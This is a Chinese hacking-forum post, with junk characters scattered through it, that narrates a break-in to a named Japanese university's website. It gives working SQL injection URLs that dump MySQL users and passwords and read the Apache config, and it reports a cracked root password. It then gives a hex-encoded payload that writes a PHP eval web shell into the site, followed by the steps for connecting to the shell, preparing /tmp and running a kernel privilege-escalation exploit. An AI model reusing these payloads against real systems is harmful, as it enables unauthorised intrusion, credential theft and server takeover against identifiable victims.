入侵日本同志社大学

admin

入侵日本同志社大学技术分析
, ~3 p& d7 Z2 q$ g2 @6 d; L/ k
9 I: e% @' d1 Y% E/ k" ~) H. Phttp://www.doshisha.ac.jp/chs/news/index.php?i=-1
) g2 g8 f$ t" w$ w  F, b# C3 |然后联合查询，猜字段，查版本，查密码，读取文件…….就是各种查啊，语句是：
0 f' l7 `9 K! e' Y- k0 x/ y2 ?7 V- _
http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file(‘/etc/httpd/conf/httpd.conf’),5,group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),7,8+from+mysql.user
' a5 @! g3 B% S, G4 o+ A4 Y2 A
; c3 t& k+ |* A* L" R" P
' }! n0 s( C+ J; O+ v& C% x
//@@datadir为数据库文件路径
- K  F# t. [& ?' l; S  D

* @) `- s' A9 Z: G//load_file读取网站容器apache的配置文件
$ H7 B& a- }6 b' x

+ J7 r* e( P4 `8 x: g) Q& M//group_concat读取MySQL管理员的名字、密码、是否允许读写文件和允许登录的远程计算机
8 w* ?/ \4 K) r: f* K! F复制代码
  r- q/ ^1 C6 ?- z2 G
$ O/ w# `& g; L# T虽然解得MySQL的root账户密码为mysql00，但是host为localhost，只允许本机登陆，所以用处不大。
0 `# c1 \0 v6 X* H" v
而且Apache的配置文件显示，服务器拒绝非该大学的ip访问/admin/和phpMyAdmin，所以即使爆出管理员账户密码也没用。
(大家对以上各种查和语句不太懂的可以参考以下文章：http://bbs.blackbap.org/thread-2243-1-1.html)
) p/ O4 b( E6 c( L, F. f2 N
+ R/ o4 G5 P, B) q6 b  O前面load_file是因为发现了各文件夹权限限制的死，不允许外校ip登陆，所以就猜了一下apache的配置文件绝对路径为默认，后来发现还真的是默认的路径。
* `0 L: X) ^. V如果知道怎么猜apache配置文件的路径的请参考以下文章：http://bbs.blackbap.org/thread-2242-1-1.html

4 g9 {2 ^7 u+ M# M; B* A5 n既然已经知道了Apache的配置文件的内容，我们也就轻易知道了网站物理路径，路径为：/http/www/koho/
  l' \1 f) D6 m. a  J虽然/admin和phpMyAdmin的目录都限制了，但是想了想，我们只要有注入点就可以可以写入shell了，因为php的GPC为off，怎么判断为off我就不说了。
直接写一句话：

http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+ 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e+into+outfile+’/http/www/koho/english/engnews_img/aa.php’#
- u! O5 X9 [, a  R1 ^2 e" t
# U3 [7 l& n% _; v
" ^* g' p6 p5 d
//最后的#是为了闭合前面的语句
4 @# R8 o% W) ^" A, l+ O7 B

: `" s: B2 Q8 s4 L+ i/*其中的0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E
  e" h% q& m4 |7 a  i- d1 j
1 E5 N# H& G8 m; `
为一句话<?php @eval($_POST['cmd']);?>的HEX编码，不懂(HEX编码)的话Google一下就好*/
  a  z( x) D) K8 r) k6 ^
/ E1 t8 G" f" {
) \8 q7 O6 ?. ]& C2 {% u! `' |//如果直接select 一句话 into outfile ‘路径’会提示字段数不同，所以select 1,2,3,4…来执行注入语句


& W  G& `8 W  j. V7 U//后面的0x3c3f2f2a和0x2a2f3f3e分别为’<?php //’的和’?>’HEX因为select后面的3,4,5,6会被写入webshell中，可能会导致一句话执行错误
! V2 d* H- X" i8 R& R% ~//所以最后aa.php的内容就是”<?php @eval($_POST['cmd']);?><?php //3,4,5,6,7 ?>”
, t, ?7 |% E/ V/ l* L7 D9 T复制代码
7 Q" R! G7 l4 H: v$ h/ j
HEX其实就是十六进制编码，不知道这个编码的话，去搜一下好了，HEX编码转换在线本地各种工具各种有
/ E: |# l. w7 f: R通过上述注入语句，我们就得到了一句话木马:
3 r* h9 G. p5 j+ n) r


9 g( Q7 ]6 q1 h1 M% L( z

( `/ c* G6 d/ O  `http://www.doshisha.ac.jp/english/engnews_img/aa.php
复制代码
7 u4 u$ }2 B- ^! s7 ^* \( B
用菜刀连接，密码是cmd，如图所示：
1 Q# E0 I6 x1 }. y- @/ F3 F+ ]然后在命令提示行里看了一下，现在的权限是：

5 z$ _8 ~% _% s. s6 u之后按照惯例我看了一下/tmp/文件夹，发现/TMP/权限居然被禁掉了，很少有服务器禁掉这个文件夹的。
2 e0 s+ {0 P* e3 ]& U好在赋权给这个文件夹不需要root，直接执行赋权语句：


- ^2 q; N/ b5 C
; C; N/ X+ q3 N  m

chmod +x /tmp/
' u5 ]1 q2 {* e( v" z复制代码
" P/ }6 ~* ?) e# p: z( d
在这说一下，linux里面的文件夹跟文件一样，执行命令自然也可以按照像文件一样的执行
然后就查了一下内核版本：
$ M/ ?7 o7 q( `3 w4 _' V! v
0 T9 V' p" f+ H9 ?. H



3 t! u6 Z4 o& k9 b& e4 cuname-a
4 Q# g' t* N9 }' C7 z& Z5 R: h

//其实lsb_release -a
4 C# Z& L" k( W复制代码
; D- j+ E' k: {5 \
$ W" Z% q6 g: }. c+ E9 y如图所示：
- p+ D* V+ K; R9 L; u9 D, h5 Q
内核版本：linux mainz1 2.6.28-194.e15
9 w& E/ n' \' }7 K7 j0 r0 Z! \) }系统描述为：Red Hat Enterprise Linux Server release 5.5 (Tikanga)
查完了系统版本之后就去找找相应的提权脚本！~然后传到/tmp/文件夹

0 I0 A7 e, L. L5 j; O: N然后给予执行权限
! w' _# W: `8 e2 B" D2 @: H# `一般我都是传上去c源文件，然后”gcc -o /tmp/程序 /tmp/C源码”这样，如果gcc不能用，在其他机器编译好了直接传上去其实也可以，就像这样
+ Y, m/ }( ~. U0 w5 `. H, Y
. O* o, q4 |& a* p# O: G( k$ I1 K
" |7 W- k; d" t


chmod +x /tmp/2.6.18-194
4 s, n& ]6 x* D# G" \复制代码 然后直接执行！~

总结：
这个注入点的基本思路就是，发现MySQL账户为root，GPC设置为off，搞到了物理路径就直接写Webshell了
提权部分原理就是，本地监听端口，将对方机器反弹回cmdshell来，然后把和内核版本对应的EXP传上去，编译运行，得到root
  i' s. ]# [, L
5 H5 P1 y3 @& c6 I$ B/ |) F4 x* _